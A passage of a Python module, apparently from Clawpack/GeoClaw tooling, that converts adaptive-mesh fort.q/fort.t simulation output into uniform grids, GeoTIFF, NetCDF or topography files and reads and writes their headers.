framenostr)\n topotype = kwargs.get(\"topotype\", None)\n _func = fort2refined\n\n arg_list.append(\n [\n frameno,\n outfname,\n outfortt,\n components,\n topotype,\n write_level,\n west,\n east,\n south,\n north,\n epsg,\n bilinear,\n ]\n )\n\n elif outputtype == \"fortuniform\":\n outfortt = os.path.join(outdir, \"fort.t\" + framenostr)\n topotype = kwargs.get(\"topotype\", None)\n _func = fort2uniform\n\n arg_list.append(\n [\n frameno,\n outfname,\n outfortt,\n xlower,\n xupper,\n ylower,\n yupper,\n mx,\n my,\n components,\n topotype,\n write_level,\n epsg,\n bilinear,\n ]\n )\n\n # now run in parallel based on func and arg list\n if parallel:\n try:\n from joblib import Parallel, delayed\n except ImportError:\n raise ImportError(\"joblib needed for parallel functionality\")\n Parallel(n_jobs=num_cores)(delayed(_func)(*args) for args in arg_list)\n else:\n # loop through prepared args.\n for args in arg_list:\n print((\"Converting {}\".format(args[1])))\n _func(*args)\n\n # return to curdir if changed.\n os.chdir(curdir)\n\n\n# =============================================================================\ndef fort2xyqscattered(framenumber, outfile=None, components=\"all\"):\n \"\"\"\n convert a fort.qXXXX amr file into a scattered data with columns x,y,q...\n q can be 1-meqn columns according to the list 'components'\n data is taken from the finest of grid intersections\n\n data are returned with x,y coordinates reflecting the cell center.\n\n arguments\n ----------\n framenumber : of fort.qXXXX\n outfile: name or file handle or None\n if outfile=None routine returns a numpy array\n components: list of q components eg. [1,3,5] or 'all' for all components\n \"\"\"\n\n if isinstance(outfile, str):\n fout = open(outfile, \"w\")\n else:\n fout = outfile\n\n numstring = str(10000 + framenumber)\n framenostr = numstring[1:]\n forttname = \"fort.t\" + framenostr\n fortqname = \"fort.q\" + framenostr\n\n solutionlist = fort2list(fortqname, forttname)\n\n if components == \"all\":\n qlst = np.arange(solutionlist[0][\"meqn\"])\n else:\n qlst = np.array(components, dtype=int) - 1\n\n levels = solutionlist[0][\"AMR_maxlevel\"]\n\n # note that solutionlist is ordered from highest levels to lowest.\n for grid in solutionlist:\n if grid[\"AMR_level\"] == levels: # highest level...data assumed nonoverlapping\n x = grid[\"xlow\"] + grid[\"dx\"] * (0.5 + (np.arange(grid[\"mx\"], dtype=float))) # converted from lower left to cell center\n y = grid[\"ylow\"] + grid[\"dy\"] * (0.5 + (np.arange(grid[\"my\"], dtype=float)))\n Q = grid[\"data\"][:, qlst]\n (X, Y) = np.meshgrid(x, y)\n X = np.reshape(X, (grid[\"mx\"] * grid[\"my\"], 1))\n Y = np.reshape(Y, (grid[\"mx\"] * grid[\"my\"], 1))\n\n try:\n XYQ = np.vstack((XYQ, np.hstack((X, Y, Q))))\n except:\n XYQ = np.hstack((X, Y, Q))\n gridrect = [grid[\"xlow\"], grid[\"ylow\"], grid[\"xupper\"], grid[\"yupper\"]]\n else: # not highest level\n # check for intersection\n gridrect = [grid[\"xlow\"], grid[\"ylow\"], grid[\"xupper\"], grid[\"yupper\"]]\n gridoverlap = False\n for rectangle in rectangles:\n if intersection(gridrect, rectangle):\n gridoverlap = True\n break\n if not gridoverlap: # take all data\n x = grid[\"xlow\"] + grid[\"dx\"] * (\n 0.5 + (np.arange(grid[\"mx\"], dtype=float))\n )\n y = grid[\"ylow\"] + grid[\"dy\"] * (\n 0.5 + (np.arange(grid[\"my\"], dtype=float))\n )\n Q = grid[\"data\"][:, qlst]\n (X, Y) = np.meshgrid(x, y)\n X = np.reshape(X, (grid[\"mx\"] * grid[\"my\"], 1))\n Y = np.reshape(Y, (grid[\"mx\"] * grid[\"my\"], 1))\n XYQ = np.vstack((XYQ, np.hstack((X, Y, Q))))\n else: # need to loop to find points\n row = 0\n for j in range(grid[\"my\"]):\n y = grid[\"ylow\"] + grid[\"dy\"] * (0.5 + float(j))\n for i in range(grid[\"mx\"]):\n x = grid[\"xlow\"] + grid[\"dx\"] * (0.5 + float(i))\n q = grid[\"data\"][row, qlst]\n # check point\n gridoverlap = False\n for rectangle in rectangles:\n if intersection([x, y, x, y], rectangle):\n gridoverlap = True\n break\n if not gridoverlap:\n XYQ = np.vstack((XYQ, np.hstack((x, y, q))))\n row = row + 1\n try:\n rectangles = np.vstack((rectangles, gridrect))\n except:\n rectangles = gridrect\n\n if not outfile:\n return XYQ\n else:\n np.savetxt(fout, XYQ)\n fout.close()\n\n\n# ==============================================================================\ndef fort2uniform(\n framenumber,\n outfortq,\n outfortt,\n xlow,\n xhi,\n ylow,\n yhi,\n mx,\n my,\n components=\"all\",\n topotype=None,\n write_level=False,\n epsg=None,\n bilinear=True,\n):\n \"\"\"\n convert fort.qXXXX with AMR data into fort.qXXXX with data on a uniform single grid.\n Resolution is user defined.\n Format is still standard clawpack fort.qXXXX /fort.tXXXX and can be plotted with clawpack utilities\n Should call with outdir being a new directory to keep original fort.q/fort.t files. Names are the same\n\n x,y of results are provided as cell centers.\n\n arguments\n ----------\n framenumber : of fort.qXXXX\n outfortq: name of output fort.qXXXX file\n outfortt: name of output fort.tXXXX file\n if above =None routine returns a numpy array\n xlower,xupper,ylower,yupper,mx,my: output grid parameters\n components: list of q components eg. [1,3,5] or 'all' for all components\n xlow\n xhi\n ylow\n yhi\n mx\n my\n components = \"all\"\n topotype\n write_level\n epsg\n \"\"\"\n\n numstring = str(10000 + framenumber)\n framenostr = numstring[1:]\n forttname = \"fort.t\" + framenostr\n fortqname = \"fort.q\" + framenostr\n\n solutionlist = fort2list(fortqname, forttname)\n\n if components == \"all\":\n qlst = np.arange(solutionlist[0][\"meqn\"])\n else:\n qlst = np.array(components, dtype=int) - 1\n\n dx = float((xhi - xlow) / mx)\n dy = float((yhi - ylow) / my)\n\n # print(dx, dy, mx, my, xlow, xhi, ylow, yhi )\n fortheader = {}\n fortheader[\"grid_number\"] = 1\n fortheader[\"AMR_level\"] = 1\n fortheader[\"mx\"] = mx\n fortheader[\"my\"] = my\n fortheader[\"xlow\"] = xlow\n fortheader[\"ylow\"] = ylow\n fortheader[\"dx\"] = dx\n fortheader[\"dy\"] = dy\n fortheader[\"naux\"] = solutionlist[0][\"naux\"]\n fortheader[\"time\"] = solutionlist[0][\"time\"]\n fortheader[\"ndim\"] = solutionlist[0][\"ndim\"]\n fortheader[\"ngrids\"] = 1\n if components == \"all\":\n fortheader[\"meqn\"] = solutionlist[0][\"meqn\"]\n else:\n fortheader[\"meqn\"] = len(components)\n\n if isinstance(outfortt, str):\n foutt = open(outfortt, \"w\")\n else:\n foutf = outfortt\n\n if topotype is not None:\n # write t file.\n forttheaderwrite(fortheader, foutt)\n foutt.close()\n\n # prepare to return an array, OR write to topo file.\n Q = np.empty((mx * my, len(qlst)))\n if write_level:\n source_level = np.empty((my, mx))\n\n for j in range(my):\n y = ylow + (j + 0.5) * dy # here x and y are cell centers based on 0.5 dx and dy adjustement.\n for i in range(mx):\n x = xlow + (i + 0.5) * dx\n qv, lev = pointfromfort((x, y), solutionlist, bilinear=bilinear)\n qout = qv[qlst]\n Q[j * mx + i] = qout\n\n if write_level:\n source_level[j, i] = lev\n\n # if topotype is specified, write out as topotype instead of\n # array or standard fort.q\n if topotype is not None:\n\n xv = np.array(xlow + dx * np.arange(mx))\n yv = np.array(ylow + dy * np.arange(my))\n (X, Y) = np.meshgrid(xv, yv)\n Y = np.flipud(Y)\n\n if topotype == \"gtif\":\n outfile = outfortq.replace(\"fortq.\", \"fortq_\") + \".tif\"\n # this should only change the file name.\n\n # manipulate shape.order of Q\n # written row by row, so shape into my, mx, meqn\n # reorder into my, mx, meqn by shift axis so meq is at front,\n # finally flip along axis 1 so that up is up.\n\n Q_out = np.flip(\n np.moveaxis(Q.reshape((my, mx, len(qlst))), (0, 1, 2), (1, 2, 0)),\n axis=1,\n )\n if write_level:\n source_level = np.flipud(source_level)\n Q_out = np.concatenate(\n (np.atleast_3d(Q_out), source_level.reshape((1, my, mx))),\n axis=0,\n )\n\n gt.griddata2gtif(\n X,\n Y,\n Q_out,\n outfile,\n epsg=epsg,\n )\n\n elif topotype == \"netcdf\":\n\n outfile = outfortq.replace(\"fortq.\", \"fortq_\") + \".nc\"\n # this should only change the file name.\n\n # manipulate shape.order of Q\n # written row by row, so shape into my, mx, meqn\n # reorder into my, mx, meqn by shift axis so meq is at front,\n # finally flip along axis 1 so that up is up.\n\n Q_out = np.flip(\n np.moveaxis(Q.reshape((my, mx, len(qlst))), (0, 1, 2), (1, 2, 0)),\n axis=1,\n )\n if write_level:\n source_level = np.flipud(source_level)\n Q_out = np.concatenate(\n (np.atleast_3d(Q_out), source_level.reshape((1, my, mx))),\n axis=0,\n )\n\n gn.griddata2netcdf(\n fortheader[\"time\"],\n X,\n Y,\n Q_out,\n outfile,\n qlst,\n write_level,\n epsg=None\n )\n\n else:\n if fortheader[\"meqn\"] > 1:\n raise ValueError(\n \"refined/uniform to topo only can take 1 element, for all use gtif\"\n )\n\n outfile = outfortq\n if topotype == \"gdal\":\n gt.griddata2topofile(\n X, Y, Q, \".tmpfile\", nodata_value_out=nodata_value\n )\n infile = \".tmpfile\"\n gt.esriheader(infile, outfile)\n os.system(\"rm .tmpfile\")\n else:\n gt.griddata2topofile(\n X, Y, Q, outfile, topotype, nodata_value_out=nodata_value\n )\n else:\n return fortheader, Q\n\n else:\n if isinstance(outfortq, str):\n foutq = open(outfortq, \"w\")\n else:\n foutq = outfortq\n\n forttheaderwrite(fortheader, foutt)\n foutt.close()\n fortqheaderwrite(fortheader, foutq, closefile=False)\n\n for j in range(my):\n foutq.write(\"\\n\")\n y = ylow + (j + 0.5) * dy # here also we are extracting at cell centers.\n for i in range(mx):\n x = xlow + (i + 0.5) * dx\n qv, lev = pointfromfort((x, y), solutionlist, bilinear=bilinear)\n qout = qv[qlst]\n for q in qout:\n foutq.write(\"%s \" % float(q))\n foutq.write(\"\\n\")\n foutq.close()\n\n\n# ==============================================================================\ndef fort2refined(\n framenumber,\n outfortq,\n outfortt,\n components=\"all\",\n topotype=None,\n write_level=False,\n west=None,\n east=None,\n south=None,\n north=None,\n epsg=None,\n bilinear=True,\n):\n \"\"\"\n convert fort.qXXXX with AMR data into fort.qXXXX with data on a uniform single grid.\n Resolution is at that of the highest level grids.\n Format is still standard clawpack fort.qXXXX /fort.tXXXX and can be plotted with clawpack utilities\n Should call with outdir being a new directory to keep original fort.q/fort.t files. Names are the same\n\n future plans:\n this routine could be more efficient by directly assigning the highest level data\n for simplicity, now it just loops point by point.\n arguments\n ----------\n framenumber : of fort.qXXXX\n outfortq: name of output fort.qXXXX file\n outfortt: name of output fort.tXXXX file\n if =None routine returns a numpy array\n components: list of q components eg. [1,3,5] or 'all' for all components\n topotype:\n write_level: bool, to write the level from which values are taken.\n west=None,\n east=None,\n south=None,\n north=None,\n epsg=None,\n \"\"\"\n numstring = str(10000 + framenumber)\n framenostr = numstring[1:]\n forttname = \"fort.t\" + framenostr\n fortqname = \"fort.q\" + framenostr\n\n solutionlist = fort2list(fortqname, forttname)\n\n if components == \"all\":\n qlst = np.arange(solutionlist[0][\"meqn\"])\n else:\n qlst = np.array(components, dtype=int) - 1\n\n levels = solutionlist[0][\"AMR_maxlevel\"]\n xlow = solutionlist[0][\"xlowdomain\"]\n ylow = solutionlist[0][\"ylowdomain\"]\n xhi = solutionlist[0][\"xhidomain\"]\n yhi = solutionlist[0][\"yhidomain\"]\n dx = solutionlist[0][\"dx\"]\n dy = solutionlist[0][\"dy\"]\n\n mx = int((xhi - xlow) / dx)\n my = int((yhi - ylow) / dy)\n # if any of nsew is not none crop extent.\n if east is not None or west is not None:\n xs = np.linspace(xlow, xhi, mx)\n if east is not None:\n xhi = np.max(xs[xs < east])\n if west is not None:\n xlow = np.min(xs[xs > west])\n mx = int((xhi - xlow) / dx)\n if north is not None or south is not None:\n ys = np.linspace(ylow, yhi, my)\n if north is not None:\n yhi = np.max(ys[ys < north])\n if south is not None:\n ylow = np.min(ys[ys > south])\n my = int((yhi - ylow) / dy)\n\n # fort2uniform will extract at cell centers based on the bounding rectangle defined.\n return fort2uniform(\n framenumber,\n outfortq,\n outfortt,\n xlow,\n xhi,\n ylow,\n yhi,\n mx,\n my,\n components,\n topotype,\n write_level,\n epsg,\n )\n\n\n# ==============================================================================\ndef fort2topotype(\n framenumber, outfile, fortdir, xll, yll, cellsize, ncols, nrows, m=1, topotype=2, bilinear=True,\n):\n \"\"\"\n convert data in a fort file of framenumber = XXXX, ie fort.qXXXX\n to a DEM style file of topotype=1,2 or 3, or gdal (gdal/esri header) with uniform spacing.\n m is the component of q, ie. the column in the fort.qXXXX file\n for all components of q, see fort2xyscattered or amr2single\n\n specifying xll, yll, cellsize, ncols, nrows will result in interpolation of AMR data\n\n without xll, yll, cellsize, ncols, nrows...the domain will be the same as input frame\n and coarse resolution.\n \"\"\"\n\n numstring = str(10000 + framenumber)\n framenostr = numstring[1:]\n forttname = os.path.join(fortdir, \"fort.t\" + framenostr)\n fortqname = os.path.join(fortdir, \"fort.q\" + framenostr)\n\n nodata_value = -9999.0\n\n solutionlist = fort2list(fortqname, forttname)\n\n if not xll:\n dx = solutionlist[0][\"dx\"]\n dy = solutionlist[0][\"dy\"]\n xll = solutionlist[0][\"xlowdomain\"]\n yll = solutionlist[0][\"ylowdomain\"]\n xhi = solutionlist[0][\"xhidomain\"]\n yhi = solutionlist[0][\"yhidomain\"]\n\n cellsize = min(dx, dy)\n ncols = int(np.floor((xhi - xll) / cellsize))\n nrows = int(np.floor((yhi - yll) / cellsize))\n\n xll = xll + 0.5 * cellsize # Here we adjust to get cell centers.\n yll = yll + 0.5 * cellsize\n xhi = xhi - 0.5 * cellsize\n yhi = yhi - 0.5 * cellsize\n\n meqn = solutionlist[0][\"meqn\"]\n\n xv = np.array(xll + cellsize * np.arange(ncols))\n yv = np.array(yll + cellsize * np.arange(nrows))\n\n (X, Y) = np.meshgrid(xv, yv)\n\n Y = np.flipud(Y)\n\n Q = np.zeros(np.shape(X))\n\n if m == \"topo\":\n for j in range(ncols):\n xp = X[0, j]\n for i in range(nrows):\n yp = Y[i, 0]\n qv, lev = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n Q[i, j] = qv[meqn - 1] - qv[0]\n\n elif m == \"depth\":\n for j in range(ncols):\n xp = X[0, j]\n for i in range(nrows):\n yp = Y[i, 0]\n qv, lev = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n depth = qv[0]\n if depth <= 1.0e-3:\n depth = nodata_value\n Q[i, j] = depth\n\n elif m == \"eta\":\n for j in range(ncols):\n xp = X[0, j]\n for i in range(nrows):\n yp = Y[i, 0]\n qv, lev = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n eta = qv[meqn - 1]\n if qv[0] <= 1.0e-3:\n eta = nodata_value\n Q[i, j] = eta\n\n elif m == \"all\":\n Q = np.zeros((ncols * nrows, meqn))\n for i in range(nrows):\n yp = Y[i, 0]\n for j in range(ncols):\n xp = X[0, j]\n k = i * ncols + j\n qv, lev = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n Q[k] = qv\n\n else:\n for j in range(ncols):\n xp = X[0, j]\n for i in range(nrows):\n yp = Y[i, 0]\n qv, lev = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n Q[i, j] = qv[m - 1]\n\n if m == \"all\":\n headerstring = \"\"\"\n\n\n \"\"\"\n np.savetxt(outfile, Q) # ,header=headerstring) save for new numpy version\n elif topotype == \"gdal\":\n gt.griddata2topofile(X, Y, Q, \".tmpfile\", nodata_value_out=nodata_value)\n infile = \".tmpfile\"\n gt.esriheader(infile, outfile)\n os.system(\"rm .tmpfile\")\n else:\n gt.griddata2topofile(X, Y, Q, outfile, topotype, nodata_value_out=nodata_value)\n\n\n# ==============================================================================\ndef griddata2fort(\n X,\n Y,\n Q,\n qoutputfile,\n toutputfile,\n time=0.0,\n naux=0,\n ndim=2,\n grid_number=1,\n AMR_level=1,\n):\n \"\"\"\n !!!!WIP -- NOT TESTED!!!\n griddata2fort creates a clawpack fort file from grid datasets\n Q - numpy array, shape(Q)=(mx,my,meqn)\n \"\"\"\n\n Qshape = np.shape(Q)\n if len(Qshape) == 2:\n my = len(Q[:, 0])\n mx = len(Q[0, :])\n meqn = 1\n Qfort = np.reshape(Q, (mx * my, 1))\n elif len(Qshape) == 3:\n my = len(Q[:, 0, 0])\n mx = len(Q[0, :, 0])\n meqn = Qshape[2]\n Qfort = np.reshape(Q, (mx * my, 1))\n xlow = X[0, 0] # FLAG DAVE: This probably needs adjusting for cell center vs lower left.\n ylow = Y[-1, 0]\n dx = X[0, 1] - X[0, 0]\n dy = Y[0, 0] - Y[1, 0]\n\n array2fort(\n Qfort,\n outfortqfile,\n outforttfile,\n xlow,\n ylow,\n mx,\n my,\n dx,\n dy,\n time,\n naux,\n ndim,\n grid_number,\n AMR_level,\n )\n\n return\n\n\n# ==============================================================================\ndef array2fort(\n Q,\n fort_q_outfile,\n fort_t_outfile,\n xlow,\n ylow,\n mx,\n my,\n dx,\n dy,\n time=0.0,\n naux=0,\n ndim=2,\n grid_number=1,\n AMR_level=1,\n):\n \"\"\"\n array2fortfile creates a clawpack fort file (single grid) for a single array, Q.\n Assumed that shape(Q) = (mx*my,meqn); ie: array Q is not reshaped.\n \"\"\"\n\n meqn = np.shape(Q)[1] + 1\n\n # creat header for toutputfile\n forttheader = forttheader = {}\n forttheader[\"time\"] = time\n forttheader[\"meqn\"] = meqn\n forttheader[\"ngrids\"] = 1\n forttheader[\"naux\"] = naux\n forttheader[\"ndim\"] = ndim\n forttheaderwrite(forttheader, fort_t_outfile, closefile=True)\n\n fortqheader = {}\n fortqheader[\"xlow\"] = xlow\n fortqheader[\"ylow\"] = ylow\n fortqheader[\"dx\"] = dx\n fortqheader[\"dy\"] = dy\n fortqheader[\"mx\"] = mx\n fortqheader[\"my\"] = my\n fortqheader[\"grid_number\"] = 1\n fortqheader[\"AMR_level\"] = 1\n\n foutq = fortqheaderwrite(fortqheader, fort_q_outfile, closefile=False)\n for j in range(my):\n foutq.write(\"\\n\")\n for i in range(mx):\n rowind = j * mx + i\n qout = Q[rowind, :]\n for q in qout:\n foutq.write(\"%s \" % float(q))\n foutq.write(\"\\n\")\n foutq.close()\n\n return\n\n\n# ==============================================================================\ndef fort2griddata(fortqname, forttname, m=1, bilinear=True):\n \"\"\"\n convert data in a fort file ie fort.qXXXX\n to numpy arrays X,Y,Q (single gridded data)\n m is the component of q, ie. the column in the fort.qXXXX file\n \"\"\"\n\n solutionlist = fort2list(fortqname, forttname)\n fortqheader = fortqheaderread(fortqname)\n xll = fortqheader[\"xlow\"]\n yll = fortqheader[\"ylow\"]\n dx = fortqheader[\"dx\"]\n dy = fortqheader[\"dy\"]\n ncols = fortqheader[\"mx\"]\n nrows = fortqheader[\"my\"]\n\n xv = np.array(xll + dx * np.arange(ncols)) # FLAG DAVE\n yv = np.array(yll + dy * np.arange(nrows)) # 0.5 DX, DY adjustement?\n\n (X, Y) = np.meshgrid(xv, yv)\n\n Y = np.flipud(Y)\n\n Q = np.zeros(np.shape(X))\n\n for j in range(ncols):\n xp = X[0, j]\n for i in range(nrows):\n yp = Y[i, 0]\n qv = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n Q[i, j] = qv[m - 1]\n\n return X, Y, Q\n\n\n# ==============================================================================\n\n# ==============================================================================\ndef fort2griddata_vector(fortqname, forttname, meqn=7, bilinear=True):\n \"\"\"\n convert data in a fort file ie fort.qXXXX\n to numpy arrays X,Y,Q (single gridded data)\n m is the component of q, ie. the column in the fort.qXXXX file\n \"\"\"\n\n solutionlist = fort2list(fortqname, forttname)\n fortqheader = fortqheaderread(fortqname)\n xll = fortqheader[\"xlow\"]\n yll = fortqheader[\"ylow\"]\n dx = fortqheader[\"dx\"]\n dy = fortqheader[\"dy\"]\n ncols = fortqheader[\"mx\"]\n nrows = fortqheader[\"my\"]\n\n xv = np.array(xll + dx * np.arange(ncols)) # FLAG DAVE\n yv = np.array(yll + dy * np.arange(nrows)) # 0.5 DX, DY adjustement?\n\n (X, Y) = np.meshgrid(xv, yv)\n\n Y = np.flipud(Y)\n\n Xshape = np.shape(X)\n # meqn = 7\n mq = meqn + 1\n Qshape = (Xshape[0], Xshape[1], mq)\n Q = np.zeros(Qshape)\n\n for j in range(ncols):\n xp = X[0, j]\n for i in range(nrows):\n yp = Y[i, 0]\n qv = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n Q[i, j, :] = qv\n # import pdb;pdb.set_trace()\n\n return X, Y, Q\n\n\n# ==============================================================================\ndef fort2griddata_framenumbers(framenumber, fortdir, m=1, bilinear=True):\n \"\"\"\n convert data in a fort file of framenumber = XXXX, ie fort.qXXXX\n to numpy arrays X,Y,Q (single gridded data)\n m is the component of q, ie. the column in the fort.qXXXX file\n \"\"\"\n\n try:\n import dclaw.topotools as gt\n except:\n import geoclaw.topotools as gt\n\n if isinstance(framenumber, str):\n numstring = framenumber\n elif isinstance(framenumber, int):\n numstring = str(10000 + framenumber)\n\n framenostr = numstring[1:]\n forttname = \"fort.t\" + framenostr\n fortqname = \"fort.q\" + framenostr\n\n solutionlist = fort2list(fortqname, forttname)\n\n xv = np.array(xll + cellsize * np.arange(ncols)) # FLAG DAVE\n yv = np.array(yll + cellsize * np.arange(nrows)) # 0.5 DX, DY adjustement?\n\n (X, Y) = np.meshgrid(xv, yv)\n\n Y = np.flipud(Y)\n\n Q = np.zeros(np.shape(X))\n\n for j in range(ncols):\n xp = X[0, j]\n for i in range(nrows):\n yp = Y[i, 0]\n qv, lev = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n Q[i, j] = qv[m - 1]\n\n return X, Y, Q\n\n\n# =========================================================================================\ndef forttheaderread(inputfile, closefile=True):\n\n \"\"\"\n read the header in inputfile (fort.tXXX) and place in dictionary forttheader to be returned.\n The header is of the following form with columns containing the forttheader value and keyword respectively.\n\n\n float time\n int meqn\n int ngrids\n int naux\n int ndim\n \"\"\"\n\n if isinstance(inputfile, str):\n fin = open(inputfile, \"r\")\n else:\n fin = inputfile\n\n forttheader = {}\n\n field = fin.readline().split()\n forttheader[\"time\"] = float(field[0])\n\n field = fin.readline().split()\n forttheader[\"meqn\"] = int(field[0])\n\n field = fin.readline().split()\n forttheader[\"ngrids\"] = int(field[0])\n\n field = fin.readline().split()\n forttheader[\"naux\"] = int(field[0])\n\n field = fin.readline().split()\n forttheader[\"ndim\"] = int(field[0])\n\n if closefile:\n fin.close()\n return forttheader\n else:\n return fin, forttheader\n\n # end fortqheader===============================================================================\n\n\n# ============================================================================\ndef forttheaderwrite(forttheader, outputfile, closefile=True):\n\n \"\"\"\n forttheaderwrite opens an ascii topography data file and writes the header\n using the dictionary \"forttheader\"\n\n The header is of the following form with columns containing value and key respectively.\n\n float time\n int meqn\n int ngrids\n int naux\n int ndim\n\n\n if closefile==True: the file is closed. Otherwise return the open file object.\n \"\"\"\n\n if isinstance(outputfile, str):\n fout = open(outputfile, \"w\")\n else:\n fout = outputfile\n\n fout.write(\"%s %s\\n\" % (float(forttheader[\"time\"]), \"time\"))\n fout.write(\"%s %s\\n\" % (forttheader[\"meqn\"], \"meqn\"))\n fout.write(\"%s %s\\n\" % (int(forttheader[\"ngrids\"]), \"ngrids\"))\n fout.write(\"%s %s\\n\" % (int(forttheader[\"naux\"]), \"naux\"))\n fout.write(\"%s %s\\n\" % (int(forttheader[\"ndim\"]), \"ndim\"))\n\n if closefile:\n fout.close()\n else:\n return fout\n # end headerwriter=========================================================================\n\n\n# =========================================================================================\ndef fortqheaderread(inputfile, closefile=True):\n\n \"\"\"\n read an individual header in inputfile (fort.qXXXX) and place in dictionary fortqheader to be returned.\n The header is of the following form with columns containing the fortqheader value and keyword respectively.\n\n int grid_number\n int AMR_level\n int mx\n int my\n float xlow\n float ylow\n float dx\n float dy\n \"\"\"\n if isinstance(inputfile, str):\n fin = open(inputfile, \"r\")\n else:\n fin = inputfile\n\n fortqheader = {}\n\n field = fin.readline().split()\n fortqheader[\"grid_number\"] = int(field[0])\n\n field = fin.readline().split()\n fortqheader[\"AMR_level\"] = int(field[0])\n\n field = fin.readline().split()\n fortqheader[\"mx\"] = int(field[0])\n\n field = fin.readline().split()\n fortqheader[\"my\"] = int(field[0])\n\n field = fin.readline().split()\n fortqheader[\"xlow\"] = float(field[0])\n\n field = fin.readline().split()\n fortqheader[\"ylow\"] = float(field[0])\n\n field = fin.readline().split()\n fortqheader[\"dx\"] = float(field[0])\n\n field = fin.readline().split()\n fortqheader[\"dy\"] = float(field[0])\n\n if closefile:\n fin.close()\n return fortqheader\n else:\n return fin, fortqheader\n\n # end fortqheader===============================================================================\n\n\n# ============================================================================\ndef fortqheaderwrite(fortqheader, outfile, closefile=True):\n\n \"\"\"\n fortqheaderwrite writes the header in fort.qXXXX files\n using the dictionary \"fortqheader\"\n\n outputfile can be a filename or file handle\n\n The header is of the following form with columns containing value and key respectively.\n\n int grid_number\n int AMR_level\n int mx\n int my\n float xlow\n float ylow\n float dx\n float dy\n\n\n if closefile==True: the file is closed. Otherwise return the open file object.\n \"\"\"\n\n if isinstance(outfile, str):\n fout = open(outfile, \"w\")\n else:\n fout = outfile\n\n fout.write(\"%s %s\\n\" % (int(fortqheader[\"grid_number\"]), \"grid_number\"))\n fout.write(\"%s %s\\n\" % (int(fortqheader[\"AMR_level\"]), \"AMR_level\"))\n fout.write(\"%s %s\\n\" % (int(fortqheader[\"mx\"]), \"mx\"))\n fout.write(\"%s %s\\n\" % (int(fortqheader[\"my\"]), \"my\"))\n fout.write(\"%s %s\\n\" % (float(fortqheader[\"xlow\"]), \"xlow\"))\n fout.write(\"%s %s\\n\" % (float(fortqheader[\"ylow\"]), \"ylow\"))\n fout.write(\"%s %s\\n\" % (float(fortqheader[\"dx\"]), \"dx\"))\n fout.write(\"%s %s\\n\" % (float(fortqheader[\"dy\"]), \"dy\"))\n\n if closefile:\n fout.close()\n else:\n return fout\n # end headerwriter=========================================================================\n\n\n# ================================================================================\ndef fort2list(fortqname, forttname):\n \"\"\"\n read fort.qXXXX file and make a list, solutionlist. Each element of the list is\n a dictionary representation of an individual grid (all data and relevant grid params)\n \"\"\"\n\n fortt = forttheaderread(forttname)\n fin = open(fortqname, \"r\")\n\n ngrids = fortt[\"ngrids\"]\n solutionlist = []\n\n for gridinlist in range(ngrids):\n fin, fortq = fortqheaderread(fin, closefile=False)\n griddict = {}\n griddict.update(fortt)\n griddict.update(fortq)\n griddict[\"xupper\"] = griddict[\"xlow\"] + griddict[\"mx\"] * griddict[\"dx\"]\n griddict[\"yupper\"] = griddict[\"ylow\"] + griddict[\"my\"] * griddict[\"dy\"]\n rows = griddict[\"mx\"] * griddict[\"my\"]\n grid = np.zeros((rows, griddict[\"meqn\"]))\n row = 0\n for my in range(griddict[\"my\"]):\n fin.readline()\n for mx in range(griddict[\"mx\"]):\n line1 = fin.readline().split()\n # line2 = fin.readline().split()\n grid[row, :] = np.array((line1), dtype=float)\n row = row + 1\n\n fin.readline()\n # copy might be inefficient...is a deep copy needed? introduced in debugging\n griddict[\"data\"] = copy.copy(grid)\n solutionlist.append(griddict)\n fin.close()\n\n xlowdomain = np.inf\n ylowdomain = np.inf\n xhidomain = -np.inf\n yhidomain = -np.inf\n maxlevel = 0\n for gridinlist in range(ngrids):\n xlowdomain = min(xlowdomain, solutionlist[gridinlist][\"xlow\"])\n ylowdomain = min(ylowdomain, solutionlist[gridinlist][\"ylow\"])\n xhidomain = max(xhidomain, solutionlist[gridinlist][\"xupper\"])\n yhidomain = max(yhidomain, solutionlist[gridinlist][\"yupper\"])\n maxlevel = max(maxlevel, solutionlist[gridinlist][\"AMR_level\"])\n for gridinlist in range(ngrids):\n solutionlist[gridinlist][\"xlowdomain\"] = xlowdomain\n solutionlist[gridinlist][\"ylowdomain\"] = ylowdomain\n solutionlist[gridinlist][\"xhidomain\"] = xhidomain\n solutionlist[gridinlist][\"yhidomain\"] = yhidomain\n solutionlist[gridinlist][\"AMR_maxlevel\"] = maxlevel\n\n orderedlist = sorted(solutionlist, key=lambda k: k[\"AMR_level\"])\n orderedlist.reverse()\n\n return orderedlist\n\n\n# ===============================================================================\ndef pointfromfort(point, solutionlist, bilinear=True):\n \"\"\"\n for a point (x,y) return the solution vector q determined from the\n best grid available for that point.\n future plans: array from fort takes numpy grid arrays X,Y\n \"\"\"\n\n xp = point[0]\n yp = point[1]\n\n griddict = solutionlist[0]\n dintersection = (\n (xp >= griddict[\"xlowdomain\"])\n & (xp <= griddict[\"xhidomain\"])\n & (yp >= griddict[\"ylowdomain\"])\n & (yp <= griddict[\"yhidomain\"])\n )\n\n if not dintersection:\n print(\"ERROR: point outside of domain:\")\n print((\"point x= %d y=%d\" % (point)))\n print(\n (\n \"domain x bounds: %d -- %d\"\n % (griddict[\"xlowdomain\"], griddict[\"xhidomain\"])\n )\n )\n print(\n (\n \"domain y bounds: %d -- %d\"\n % (griddict[\"ylowdomain\"], griddict[\"yhidomain\"])\n )\n )\n raise SystemExit(0)\n\n intersection = False\n grid = {}\n for trygrid in solutionlist:\n intersection = (\n (xp >= trygrid[\"xlow\"])\n & (xp <= trygrid[\"xupper\"])\n & (yp >= trygrid[\"ylow\"])\n & (yp <= trygrid[\"yupper\"])\n )\n if intersection:\n grid = copy.copy(trygrid)\n break\n\n try:\n xlow = grid[\"xlow\"]\n ylow = grid[\"ylow\"]\n yhi = grid[\"yupper\"]\n xhi = grid[\"xupper\"]\n dx = grid[\"dx\"]\n dy = grid[\"dy\"]\n mx = grid[\"mx\"]\n my = grid[\"my\"]\n data = grid[\"data\"]\n level = grid[\"AMR_level\"]\n except KeyError:\n\n print((\"point is possibly on amr grid edge: x= %s y=%s\" % (point)))\n print((\"intersection? %s\" % (intersection)))\n print(\"taking data from adjacent grid\")\n eps = 1e-5\n\n for trygrid in solutionlist:\n 